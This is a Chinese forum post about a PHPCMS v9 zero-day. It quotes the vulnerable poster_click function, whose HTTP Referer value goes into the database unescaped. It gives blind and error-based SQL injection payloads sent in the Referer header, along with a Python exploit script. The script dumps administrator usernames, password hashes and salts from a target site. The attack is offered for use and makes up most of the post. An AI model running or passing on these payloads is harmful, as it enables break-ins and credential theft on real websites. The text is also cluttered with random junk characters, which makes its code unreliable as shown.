有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:( u, @* I$ z' v& T& k8 A0 f
+ o1 d% S9 {; |. P5 X( ~) G问题函数\phpcms\modules\poster\index.php
8 F0 |7 V1 T/ f( m% W6 J, W1 U/ H5 {7 j1 g
public function poster_click() {
( Y- p* i+ X, L$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
+ E1 O0 @: c$ I6 X+ [$r = $this->db->get_one(array('id'=>$id));5 \; w$ T0 I' F8 Y9 }) z, a% n5 n$ _
if (!is_array($r) && empty($r)) return false; N. ~& R7 f* S# N9 e
$ip_area = pc_base::load_sys_class('ip_area');& j' H9 X2 _( R" @8 e9 ^
$ip = ip();7 }& J9 J; L. d6 O# {! `" V% E
$area = $ip_area->get($ip);4 z* P0 a) l. D
$username = param::get_cookie('username') ? param::get_cookie('username') : '';3 k+ w0 f; H- Z, s
if($id) {6 Q# W% q/ W2 x+ R0 z0 s; ?
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
- q7 H: d! d& j! N) I8 }5 d. ?$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));& R _; F5 @% Z' P
}
0 d7 G) V* M9 u P2 L1 D4 e3 H$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
0 `& T4 P1 B5 l: Q2 K; V: `4 R$setting = string2array($r['setting']);; z* m; y; @" T4 |
if (count($setting)==1) {1 W/ x0 @6 X c c3 L3 O
$url = $setting['1']['linkurl'];) @4 j7 E6 g" n4 r9 v- p Z
} else {1 I" N) l3 ?& p' h
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
1 z, a# O6 Q) ]& J% D8 q}
& T7 `! ~# i3 E2 v! kheader('Location: '.$url);! y# f G; S; a$ G1 Y9 j
}
4 m& s! y2 v' j. W# W+ X" ]3 C( u6 I& d2 `7 J4 [7 y5 ]' c
* i0 o% o6 X5 k+ S% h9 G. {
- k& }+ V& M& {3 E' R4 Z利用方式:
% |6 ?" }/ }% W# ~9 q
7 I: u! ^8 }* C; e* c/ P9 m1、可以采用盲注入的手法:
1 b0 ^% e! r! j$ G9 C2 v, Q |# U( S" t* A2 {+ ^9 {5 b
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#% F/ h3 `8 F$ L6 E3 N) x
9 x# a8 A$ }, k! X: y4 t1 B
通过返回页面,正常与否一个个猜解密码字段。+ `" w8 `" {9 \# G. n; q: }8 E
- m" ], b# L9 c2 I( V) d2 c2、代码是花开写的,随手附上了:
. Y1 o, H% s r5 I$ B
' U8 |! u j; j. ?+ N" x1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#' N1 l: S6 ^& d8 E3 Y) z! t9 `: J
9 C% ]2 y i" e7 m3 `, T此方法是爆错注入手法,原理自查。2 W2 \* [* w2 z
. A+ e' V6 r' R$ ?0 n
9 v) }& \9 [. V" {8 I
q( d4 }3 Q. b0 [2 H; w- h% y利用程序:( y& w" m: `* X, ^- X0 V1 H3 u
0 |: h) m& s5 x6 D2 L- ]6 u
#!/usr/bin/env python& ?( S9 i% w1 N1 d" ^
import httplib,sys,re6 W/ @7 T, R6 n
# F$ s* m$ m* b6 ]$ S
def attack():
5 B. h! z3 x) e9 D, wprint “Code by Pax.Mac Team conqu3r!”' c+ {6 k( o( q. x2 @8 H
print “Welcome to our zone!!!”: C) b% A H! M. ]+ o1 q
url=sys.argv[1]
+ |: g7 i8 m! |paths=sys.argv[2]4 T7 E4 U8 m, m7 a
conn = httplib.HTTPConnection(url)3 u5 J$ @: C8 g( t
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
+ K4 L" U* ]% c2 D2 s2 R4 F# e“Accept”: “text/plain”,
" c( H; X6 i* l8 J' F, l4 L% d9 k+ i. o“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}2 [7 O5 |) ~8 p! f9 D2 _6 @5 P* a
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
: u! Z }3 _5 m; ~: Jr1 = conn.getresponse()
; V, L- N( H* s9 ]datas=r1.read()8 d& _+ p+ }; |4 ?
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
8 T. v. G/ T2 p e% Eprint datas[0]( {% d ?- S4 U5 R2 m( j0 U
conn.close()
' u; @9 p4 |) K& ?7 Q0 E0 S$ Dif __name__==”__main__”:9 k% L, T4 _( A4 u9 G2 j8 O
if len(sys.argv)<3:
$ h Q( Z }! E7 w7 nprint “Code by Pax.Mac Team conqu3r”3 D& V8 @# O; `; ^' N, g. c7 l
print “Usgae:”' Z; t+ d9 D( {. v# S2 S6 o
print “ phpcmsattack.py www.paxmac.org /”
, P$ w5 A, z6 o2 f; Bprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”4 K8 R" c: k* z( Q
sys.exit(1)
* Z' p; h# p: b& L. c. q+ q- Qattack()
7 c) A7 \7 F5 k, W; X. d5 @: H: g3 `- |; J5 i; H+ V& O/ Q" ^ b$ s! t% t
|